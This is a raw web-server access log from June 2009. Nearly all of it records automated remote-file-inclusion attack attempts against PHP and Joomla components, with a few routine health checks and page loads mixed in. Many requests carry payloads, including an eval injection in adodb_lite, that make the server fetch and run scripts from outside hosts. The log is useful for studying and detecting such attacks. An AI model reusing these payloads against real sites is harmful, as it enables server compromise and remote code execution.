64.191.102.117 - - [06/Jun/2009:03:52:30 -0400] "GET /logs/access_log.Q109052900%20%20/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://www.omsklyvr.omit.ru/id1.txt? HTTP/1.1" 404 267 "-" "Mozilla/5.0"
64.191.102.117 - - [06/Jun/2009:03:52:57 -0400] "GET /logs/access_log.Q109053100%20%20/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://www.omsklyvr.omit.ru/id1.txt? HTTP/1.1" 404 267 "-" "Mozilla/5.0"
64.191.102.117 - - [06/Jun/2009:03:53:06 -0400] "GET /logs/access_log.Q109053100%20%20/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://www.omsklyvr.omit.ru/id1.txt? HTTP/1.1" 404 267 "-" "Mozilla/5.0"
209.59.12.99 - - [06/Jun/2009:03:56:45 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
74.6.8.112 - - [06/Jun/2009:03:57:45 -0400] "GET /logs/access_log.Q108032100 HTTP/1.0" 404 224 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
218.145.31.131 - - [06/Jun/2009:04:01:05 -0400] "GET /administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.kiralyfa.hu/copyright?? HTTP/1.1" 404 256 "-" "Mozilla/5.0"
218.145.31.131 - - [06/Jun/2009:04:01:05 -0400] "GET /logs/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.kiralyfa.hu/copyright?? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
218.145.31.131 - - [06/Jun/2009:04:01:05 -0400] "GET /logs/access_log.Q109052500/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.kiralyfa.hu/copyright?? HTTP/1.1" 404 283 "-" "Mozilla/5.0"
218.145.31.131 - - [06/Jun/2009:04:01:21 -0400] "GET /administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.kiralyfa.hu/copyright?? HTTP/1.1" 404 256 "-" "Mozilla/5.0"
218.145.31.131 - - [06/Jun/2009:04:01:21 -0400] "GET /logs/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.kiralyfa.hu/copyright?? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
218.145.31.131 - - [06/Jun/2009:04:01:21 -0400] "GET /logs/access_log.Q109053000%20%20/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.kiralyfa.hu/copyright?? HTTP/1.1" 404 285 "-" "Mozilla/5.0"
209.59.12.99 - - [06/Jun/2009:04:01:49 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
218.145.31.131 - - [06/Jun/2009:04:02:15 -0400] "GET /logs/access_log.Q109052500%20%20/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.kiralyfa.hu/copyright?? HTTP/1.1" 404 285 "-" "Mozilla/5.0"
218.145.31.131 - - [06/Jun/2009:04:02:28 -0400] "GET /administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.kiralyfa.hu/copyright?? HTTP/1.1" 404 256 "-" "Mozilla/5.0"
218.145.31.131 - - [06/Jun/2009:04:02:28 -0400] "GET /logs/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.kiralyfa.hu/copyright?? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
218.145.31.131 - - [06/Jun/2009:04:02:28 -0400] "GET /logs/access_log.Q109052500/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.kiralyfa.hu/copyright?? HTTP/1.1" 404 283 "-" "Mozilla/5.0"
64.191.102.117 - - [06/Jun/2009:04:02:47 -0400] "GET /logs/access_log.Q109052900/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://www.omsklyvr.omit.ru/id1.txt? HTTP/1.1" 404 265 "-" "Mozilla/5.0"
218.145.31.131 - - [06/Jun/2009:04:02:48 -0400] "GET /logs/access_log.Q109053000/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.kiralyfa.hu/copyright?? HTTP/1.1" 404 283 "-" "Mozilla/5.0"
64.191.102.117 - - [06/Jun/2009:04:02:58 -0400] "GET /logs/access_log.Q109052900/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://www.omsklyvr.omit.ru/id1.txt? HTTP/1.1" 404 265 "-" "Mozilla/5.0"
218.149.85.37 - - [06/Jun/2009:04:03:00 -0400] "GET //modules/xt_conteudo/admin/spaw/spaw_control.class.php?spaw_root=http://www.webdeoro.com/webdeoroimages//newswiremedia///id.txt?? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
218.149.85.37 - - [06/Jun/2009:04:03:00 -0400] "GET /logs/error_log.Q109042700%20%20//modules/xt_conteudo/admin/spaw/spaw_control.class.php?spaw_root=http://www.webdeoro.com/webdeoroimages//newswiremedia///id.txt?? HTTP/1.1" 404 280 "-" "Mozilla/5.0"
218.149.85.37 - - [06/Jun/2009:04:03:00 -0400] "GET /logs//modules/xt_conteudo/admin/spaw/spaw_control.class.php?spaw_root=http://www.webdeoro.com/webdeoroimages//newswiremedia///id.txt?? HTTP/1.1" 404 257 "-" "Mozilla/5.0"
64.191.102.117 - - [06/Jun/2009:04:03:03 -0400] "GET /logs/access_log.Q109053100/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://www.omsklyvr.omit.ru/id1.txt? HTTP/1.1" 404 265 "-" "Mozilla/5.0"
218.149.85.37 - - [06/Jun/2009:04:03:06 -0400] "GET /logs/error_log.Q108071100%20%20//modules/xt_conteudo/admin/spaw/spaw_control.class.php?spaw_root=http://www.webdeoro.com/webdeoroimages//newswiremedia///id.txt?? HTTP/1.1" 404 280 "-" "Mozilla/5.0"
64.191.102.117 - - [06/Jun/2009:04:03:09 -0400] "GET /logs/access_log.Q109053100/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://www.omsklyvr.omit.ru/id1.txt? HTTP/1.1" 404 265 "-" "Mozilla/5.0"
67.15.182.18 - - [06/Jun/2009:04:04:17 -0400] "GET /components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://tkc21.co.kr/bbs/security/online/id1.txt???? HTTP/1.1" 404 256 "-" "Mozilla/5.0"
67.15.182.18 - - [06/Jun/2009:04:04:17 -0400] "GET /logs/access_log.Q109051700%20%20/components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://tkc21.co.kr/bbs/security/online/id1.txt???? HTTP/1.1" 404 285 "-" "Mozilla/5.0"
67.15.182.18 - - [06/Jun/2009:04:04:17 -0400] "GET /logs/components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://tkc21.co.kr/bbs/security/online/id1.txt???? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
67.15.182.18 - - [06/Jun/2009:04:04:45 -0400] "GET /components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://tkc21.co.kr/bbs/security/online/id1.txt???? HTTP/1.1" 404 256 "-" "Mozilla/5.0"
67.15.182.18 - - [06/Jun/2009:04:04:45 -0400] "GET /logs/components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://tkc21.co.kr/bbs/security/online/id1.txt???? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
67.15.182.18 - - [06/Jun/2009:04:04:45 -0400] "GET /logs/access_log.Q109051700%20%20/components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://tkc21.co.kr/bbs/security/online/id1.txt???? HTTP/1.1" 404 285 "-" "Mozilla/5.0"
67.15.182.18 - - [06/Jun/2009:04:04:48 -0400] "GET //modules/vwar/admin/admin.php?vwar_root=http://tkc21.co.kr/bbs/security/online/id1.txt???? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
67.15.182.18 - - [06/Jun/2009:04:04:48 -0400] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://tkc21.co.kr/bbs/security/online/id1.txt???? HTTP/1.1" 404 232 "-" "Mozilla/5.0"
67.15.182.18 - - [06/Jun/2009:04:04:48 -0400] "GET /logs/access_log.Q109050900%20%20//modules/vwar/admin/admin.php?vwar_root=http://tkc21.co.kr/bbs/security/online/id1.txt???? HTTP/1.1" 404 256 "-" "Mozilla/5.0"
119.93.90.155 - - [06/Jun/2009:04:04:49 -0400] "GET /logs/access_log.Q109051600//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://jungkyung.hs.kr/skin_shop/standard//fx29id.txt?? HTTP/1.1" 404 267 "-" "Mozilla/5.0"
67.15.182.18 - - [06/Jun/2009:04:04:53 -0400] "GET //modules/vwar/admin/admin.php?vwar_root=http://tkc21.co.kr/bbs/security/online/id1.txt???? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
67.15.182.18 - - [06/Jun/2009:04:04:53 -0400] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://tkc21.co.kr/bbs/security/online/id1.txt???? HTTP/1.1" 404 232 "-" "Mozilla/5.0"
67.15.182.18 - - [06/Jun/2009:04:04:53 -0400] "GET /logs/access_log.Q109050900%20%20//modules/vwar/admin/admin.php?vwar_root=http://tkc21.co.kr/bbs/security/online/id1.txt???? HTTP/1.1" 404 256 "-" "Mozilla/5.0"
67.15.182.18 - - [06/Jun/2009:04:05:00 -0400] "GET /logs/access_log.Q109052900%20%20/components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://tkc21.co.kr/bbs/security/online/id1.txt???? HTTP/1.1" 404 285 "-" "Mozilla/5.0"
119.93.90.155 - - [06/Jun/2009:04:05:17 -0400] "GET /logs/access_log.Q109051800//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://jungkyung.hs.kr/skin_shop/standard//fx29id.txt?? HTTP/1.1" 404 267 "-" "Mozilla/5.0"
122.153.212.195 - - [06/Jun/2009:04:05:25 -0400] "GET /logs/access_log.Q109052900/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://www.skakmat.eu/system//administrator/components/idd.txt?? HTTP/1.1" 404 265 "-" "libwww-perl/5.65"
67.15.182.18 - - [06/Jun/2009:04:05:25 -0400] "GET /logs/access_log.Q109052900%20%20/components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://tkc21.co.kr/bbs/security/online/id1.txt???? HTTP/1.1" 404 285 "-" "Mozilla/5.0"
122.153.212.195 - - [06/Jun/2009:04:05:25 -0400] "GET /lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://www.skakmat.eu/system//administrator/components/idd.txt?? HTTP/1.1" 404 238 "-" "libwww-perl/5.65"
122.153.212.195 - - [06/Jun/2009:04:05:26 -0400] "GET /logs/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://www.skakmat.eu/system//administrator/components/idd.txt?? HTTP/1.1" 404 243 "-" "libwww-perl/5.65"
70.38.54.140 - - [06/Jun/2009:04:06:20 -0400] "GET /logs/access_log.Q109051600//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.d1011163-2.cp.blacknight.com/components/com_agora/idxx.txt?? HTTP/1.1" 404 269 "-" "Mozilla/5.0"
70.38.54.140 - - [06/Jun/2009:04:06:20 -0400] "GET /logs//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.d1011163-2.cp.blacknight.com/components/com_agora/idxx.txt?? HTTP/1.1" 404 247 "-" "Mozilla/5.0"
70.38.54.140 - - [06/Jun/2009:04:06:20 -0400] "GET //components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.d1011163-2.cp.blacknight.com/components/com_agora/idxx.txt?? HTTP/1.1" 404 242 "-" "Mozilla/5.0"
209.59.12.99 - - [06/Jun/2009:04:06:50 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
218.149.85.37 - - [06/Jun/2009:04:07:30 -0400] "GET /logs/error_log.Q109042700//modules/xt_conteudo/admin/spaw/spaw_control.class.php?spaw_root=http://www.webdeoro.com/webdeoroimages//newswiremedia///id.txt?? HTTP/1.1" 404 278 "-" "Mozilla/5.0"
70.38.54.140 - - [06/Jun/2009:04:07:46 -0400] "GET /logs/access_log.Q109051000//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.d1011163-2.cp.blacknight.com/components/com_agora/idxx.txt?? HTTP/1.1" 404 269 "-" "Mozilla/5.0"
67.170.147.56 - - [06/Jun/2009:04:08:24 -0400] "GET /images/login_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/home.html" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10"
67.170.147.56 - - [06/Jun/2009:04:08:24 -0400] "GET /images/psearch_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/home.html" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10"
67.170.147.56 - - [06/Jun/2009:04:08:25 -0400] "GET /images/login_go-over.gif HTTP/1.1" 200 302 "http://www.acesurgical.com/home.html" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10"
67.170.147.56 - - [06/Jun/2009:04:08:25 -0400] "GET /images/psearch_go-over.gif HTTP/1.1" 200 302 "http://www.acesurgical.com/home.html" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10"
67.15.182.18 - - [06/Jun/2009:04:08:35 -0400] "GET /logs/access_log.Q109051700/components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://tkc21.co.kr/bbs/security/online/id1.txt???? HTTP/1.1" 404 283 "-" "Mozilla/5.0"
67.15.182.18 - - [06/Jun/2009:04:08:45 -0400] "GET ///lib/connect.lib.php?g4[path]=http://www.kq-china.com/web//plugins/system/id1.txt?? HTTP/1.1" 404 219 "-" "Mozilla/5.0"
70.38.54.140 - - [06/Jun/2009:04:08:45 -0400] "GET /logs/access_log.Q109051600%20%20//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.d1011163-2.cp.blacknight.com/components/com_agora/idxx.txt?? HTTP/1.1" 404 271 "-" "Mozilla/5.0"
67.15.182.18 - - [06/Jun/2009:04:08:45 -0400] "GET /logs///lib/connect.lib.php?g4[path]=http://www.kq-china.com/web//plugins/system/id1.txt?? HTTP/1.1" 404 224 "-" "Mozilla/5.0"
67.15.182.18 - - [06/Jun/2009:04:08:45 -0400] "GET /logs/access_log.Q109052900/components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://tkc21.co.kr/bbs/security/online/id1.txt???? HTTP/1.1" 404 283 "-" "Mozilla/5.0"
67.15.182.18 - - [06/Jun/2009:04:08:48 -0400] "GET ///lib/connect.lib.php?g4[path]=http://www.kq-china.com/web//plugins/system/id1.txt?? HTTP/1.1" 404 219 "-" "Mozilla/5.0"
67.15.182.18 - - [06/Jun/2009:04:08:48 -0400] "GET /logs///lib/connect.lib.php?g4[path]=http://www.kq-china.com/web//plugins/system/id1.txt?? HTTP/1.1" 404 224 "-" "Mozilla/5.0"
67.15.182.18 - - [06/Jun/2009:04:08:53 -0400] "GET /logs/access_log.Q109051100///lib/connect.lib.php?g4[path]=http://www.kq-china.com/web//plugins/system/id1.txt?? HTTP/1.1" 404 246 "-" "Mozilla/5.0"
67.15.182.18 - - [06/Jun/2009:04:08:56 -0400] "GET /logs/access_log.Q109051100///lib/connect.lib.php?g4[path]=http://www.kq-china.com/web//plugins/system/id1.txt?? HTTP/1.1" 404 246 "-" "Mozilla/5.0"
78.143.47.76 - - [06/Jun/2009:04:08:59 -0400] "GET /logs/access_log.Q109052100/?sourcedir=http://jasek2.fileave.com/id.txt?? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
70.38.54.140 - - [06/Jun/2009:04:09:35 -0400] "GET /logs/access_log.Q109051000%20%20//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.d1011163-2.cp.blacknight.com/components/com_agora/idxx.txt?? HTTP/1.1" 404 271 "-" "Mozilla/5.0"
67.15.182.18 - - [06/Jun/2009:04:09:40 -0400] "GET /logs/access_log.Q109051700/components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://tkc21.co.kr/bbs/security/online/id1.txt???? HTTP/1.1" 404 283 "-" "Mozilla/5.0"
67.15.182.18 - - [06/Jun/2009:04:10:00 -0400] "GET /logs/access_log.Q109052900/components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://tkc21.co.kr/bbs/security/online/id1.txt???? HTTP/1.1" 404 283 "-" "Mozilla/5.0"
124.0.73.2 - - [06/Jun/2009:04:10:01 -0400] "GET /logs//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.d1011163-2.cp.blacknight.com/components/com_agora/idxx.txt?? HTTP/1.1" 404 247 "-" "Mozilla/5.0"
124.0.73.2 - - [06/Jun/2009:04:10:01 -0400] "GET //components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.d1011163-2.cp.blacknight.com/components/com_agora/idxx.txt?? HTTP/1.1" 404 242 "-" "Mozilla/5.0"
124.0.73.2 - - [06/Jun/2009:04:10:01 -0400] "GET /logs/access_log.Q109051600//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.d1011163-2.cp.blacknight.com/components/com_agora/idxx.txt?? HTTP/1.1" 404 269 "-" "Mozilla/5.0"
121.254.243.197 - - [06/Jun/2009:04:10:03 -0400] "GET //components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.d1011163-2.cp.blacknight.com/components/com_agora/idxx.txt?? HTTP/1.1" 404 242 "-" "Mozilla/5.0"
121.254.243.197 - - [06/Jun/2009:04:10:03 -0400] "GET /logs/access_log.Q109051600//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.d1011163-2.cp.blacknight.com/components/com_agora/idxx.txt?? HTTP/1.1" 404 269 "-" "Mozilla/5.0"
121.254.243.197 - - [06/Jun/2009:04:10:03 -0400] "GET /logs//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.d1011163-2.cp.blacknight.com/components/com_agora/idxx.txt?? HTTP/1.1" 404 247 "-" "Mozilla/5.0"
67.15.182.18 - - [06/Jun/2009:04:10:10 -0400] "GET /logs/access_log.Q109050300//snippet.reflect.php?reflect_base=http://www.kq-china.com/web//plugins/system/id1.txt?? HTTP/1.1" 404 245 "-" "Mozilla/5.0"
67.15.182.18 - - [06/Jun/2009:04:10:10 -0400] "GET /logs//snippet.reflect.php?reflect_base=http://www.kq-china.com/web//plugins/system/id1.txt?? HTTP/1.1" 404 223 "-" "Mozilla/5.0"
67.15.182.18 - - [06/Jun/2009:04:10:10 -0400] "GET //snippet.reflect.php?reflect_base=http://www.kq-china.com/web//plugins/system/id1.txt?? HTTP/1.1" 404 218 "-" "Mozilla/5.0"
67.15.182.18 - - [06/Jun/2009:04:10:28 -0400] "GET /logs/access_log.Q109052300//snippet.reflect.php?reflect_base=http://www.kq-china.com/web//plugins/system/id1.txt?? HTTP/1.1" 404 245 "-" "Mozilla/5.0"
78.143.47.76 - - [06/Jun/2009:04:10:32 -0400] "GET /logs/access_log.Q109052300/?sourcedir=http://jasek2.fileave.com/id.txt?? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
124.0.73.2 - - [06/Jun/2009:04:10:45 -0400] "GET /logs/access_log.Q109051600%20%20//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.d1011163-2.cp.blacknight.com/components/com_agora/idxx.txt?? HTTP/1.1" 404 271 "-" "Mozilla/5.0"
67.15.182.18 - - [06/Jun/2009:04:10:56 -0400] "GET /logs/access_log.Q109051100%20%20///lib/connect.lib.php?g4[path]=http://www.kq-china.com/web//plugins/system/id1.txt?? HTTP/1.1" 404 248 "-" "Mozilla/5.0"
121.254.243.197 - - [06/Jun/2009:04:11:07 -0400] "GET /logs/access_log.Q109051000//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.d1011163-2.cp.blacknight.com/components/com_agora/idxx.txt?? HTTP/1.1" 404 269 "-" "Mozilla/5.0"
67.15.182.18 - - [06/Jun/2009:04:11:09 -0400] "GET /logs/access_log.Q109051100%20%20///lib/connect.lib.php?g4[path]=http://www.kq-china.com/web//plugins/system/id1.txt?? HTTP/1.1" 404 248 "-" "Mozilla/5.0"
67.15.182.18 - - [06/Jun/2009:04:11:16 -0400] "GET /logs/access_log.Q109051100/components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://tkc21.co.kr/bbs/security/online/id1.txt???? HTTP/1.1" 404 283 "-" "Mozilla/5.0"
67.15.182.18 - - [06/Jun/2009:04:11:30 -0400] "GET /logs/access_log.Q109051100/components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://tkc21.co.kr/bbs/security/online/id1.txt???? HTTP/1.1" 404 283 "-" "Mozilla/5.0"
122.153.212.195 - - [06/Jun/2009:04:11:38 -0400] "GET /logs/access_log.Q109053100/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://www.skakmat.eu/system//administrator/components/idd.txt?? HTTP/1.1" 404 265 "-" "libwww-perl/5.65"
121.254.243.197 - - [06/Jun/2009:04:11:42 -0400] "GET /logs/access_log.Q109051600%20%20//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.d1011163-2.cp.blacknight.com/components/com_agora/idxx.txt?? HTTP/1.1" 404 271 "-" "Mozilla/5.0"
209.59.12.99 - - [06/Jun/2009:04:11:51 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
121.254.243.197 - - [06/Jun/2009:04:12:13 -0400] "GET /logs/access_log.Q109051000%20%20//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.d1011163-2.cp.blacknight.com/components/com_agora/idxx.txt?? HTTP/1.1" 404 271 "-" "Mozilla/5.0"
67.15.182.18 - - [06/Jun/2009:04:12:24 -0400] "GET //snippet.reflect.php?reflect_base=http://www.kq-china.com/web//plugins/system/id1.txt?? HTTP/1.1" 404 218 "-" "Mozilla/5.0"
67.15.182.18 - - [06/Jun/2009:04:12:24 -0400] "GET /logs/access_log.Q109050300%20%20//snippet.reflect.php?reflect_base=http://www.kq-china.com/web//plugins/system/id1.txt?? HTTP/1.1" 404 247 "-" "Mozilla/5.0"
67.15.182.18 - - [06/Jun/2009:04:12:25 -0400] "GET /logs//snippet.reflect.php?reflect_base=http://www.kq-china.com/web//plugins/system/id1.txt?? HTTP/1.1" 404 223 "-" "Mozilla/5.0"
124.0.73.2 - - [06/Jun/2009:04:12:31 -0400] "GET /logs/access_log.Q109051000%20%20//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.d1011163-2.cp.blacknight.com/components/com_agora/idxx.txt?? HTTP/1.1" 404 271 "-" "Mozilla/5.0"
67.15.182.18 - - [06/Jun/2009:04:12:38 -0400] "GET /logs///administrator/components/com_wmtportfolio/admin.wmtportfolio.php?mosConfig_absolute_path=http://www.kq-china.com/web//plugins/system/id1.txt?? HTTP/1.1" 404 269 "-" "Mozilla/5.0"
67.15.182.18 - - [06/Jun/2009:04:12:38 -0400] "GET ///administrator/components/com_wmtportfolio/admin.wmtportfolio.php?mosConfig_absolute_path=http://www.kq-china.com/web//plugins/system/id1.txt?? HTTP/1.1" 404 264 "-" "Mozilla/5.0"
67.15.182.18 - - [06/Jun/2009:04:12:38 -0400] "GET /logs/access_log.Q109052100%20%20///administrator/components/com_wmtportfolio/admin.wmtportfolio.php?mosConfig_absolute_path=http://www.kq-china.com/web//plugins/system/id1.txt?? HTTP/1.1" 404 293 "-" "Mozilla/5.0"
67.15.182.18 - - [06/Jun/2009:04:12:38 -0400] "GET /logs/access_log.Q108121900%20%20//snippet.reflect.php?reflect_base=http://www.kq-china.com/web//plugins/system/id1.txt?? HTTP/1.1" 404 247 "-" "Mozilla/5.0"
67.15.182.18 - - [06/Jun/2009:04:12:41 -0400] "GET ///administrator/components/com_wmtportfolio/admin.wmtportfolio.php?mosConfig_absolute_path=http://www.kq-china.com/web//plugins/system/id1.txt?? HTTP/1.1" 404 264 "-" "Mozilla/5.0"
67.15.182.18 - - [06/Jun/2009:04:12:41 -0400] "GET /logs///administrator/components/com_wmtportfolio/admin.wmtportfolio.php?mosConfig_absolute_path=http://www.kq-china.com/web//plugins/system/id1.txt?? HTTP/1.1" 404 269 "-" "Mozilla/5.0"
67.15.182.18 - - [06/Jun/2009:04:12:41 -0400] "GET /logs/access_log.Q109052100%20%20///administrator/components/com_wmtportfolio/admin.wmtportfolio.php?mosConfig_absolute_path=http://www.kq-china.com/web//plugins/system/id1.txt?? HTTP/1.1" 404 293 "-" "Mozilla/5.0"
67.15.182.18 - - [06/Jun/2009:04:13:12 -0400] "GET /logs/access_log.Q109052100///administrator/components/com_wmtportfolio/admin.wmtportfolio.php?mosConfig_absolute_path=http://www.kq-china.com/web//plugins/system/id1.txt?? HTTP/1.1" 404 291 "-" "Mozilla/5.0"
67.15.182.18 - - [06/Jun/2009:04:13:52 -0400] "GET /logs/access_log.Q109052100///administrator/components/com_wmtportfolio/admin.wmtportfolio.php?mosConfig_absolute_path=http://www.kq-china.com/web//plugins/system/id1.txt?? HTTP/1.1" 404 291 "-" "Mozilla/5.0"
67.15.182.18 - - [06/Jun/2009:04:14:36 -0400] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://www.kq-china.com/web//plugins/system/id1.txt?? HTTP/1.1" 404 232 "-" "Mozilla/5.0"
67.15.182.18 - - [06/Jun/2009:04:14:36 -0400] "GET /logs/access_log.Q109050900%20%20//modules/vwar/admin/admin.php?vwar_root=http://www.kq-china.com/web//plugins/system/id1.txt?? HTTP/1.1" 404 256 "-" "Mozilla/5.0"
67.15.182.18 - - [06/Jun/2009:04:14:36 -0400] "GET //modules/vwar/admin/admin.php?vwar_root=http://www.kq-china.com/web//plugins/system/id1.txt?? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
67.15.182.18 - - [06/Jun/2009:04:14:38 -0400] "GET /logs/access_log.Q109050900%20%20//modules/vwar/admin/admin.php?vwar_root=http://www.kq-china.com/web//plugins/system/id1.txt?? HTTP/1.1" 404 256 "-" "Mozilla/5.0"
67.15.182.18 - - [06/Jun/2009:04:14:38 -0400] "GET //modules/vwar/admin/admin.php?vwar_root=http://www.kq-china.com/web//plugins/system/id1.txt?? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
67.15.182.18 - - [06/Jun/2009:04:14:38 -0400] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://www.kq-china.com/web//plugins/system/id1.txt?? HTTP/1.1" 404 232 "-" "Mozilla/5.0"
67.15.182.18 - - [06/Jun/2009:04:15:52 -0400] "GET /logs/access_log.Q109050900//modules/vwar/admin/admin.php?vwar_root=http://tkc21.co.kr/bbs/security/online/id1.txt???? HTTP/1.1" 404 254 "-" "Mozilla/5.0"
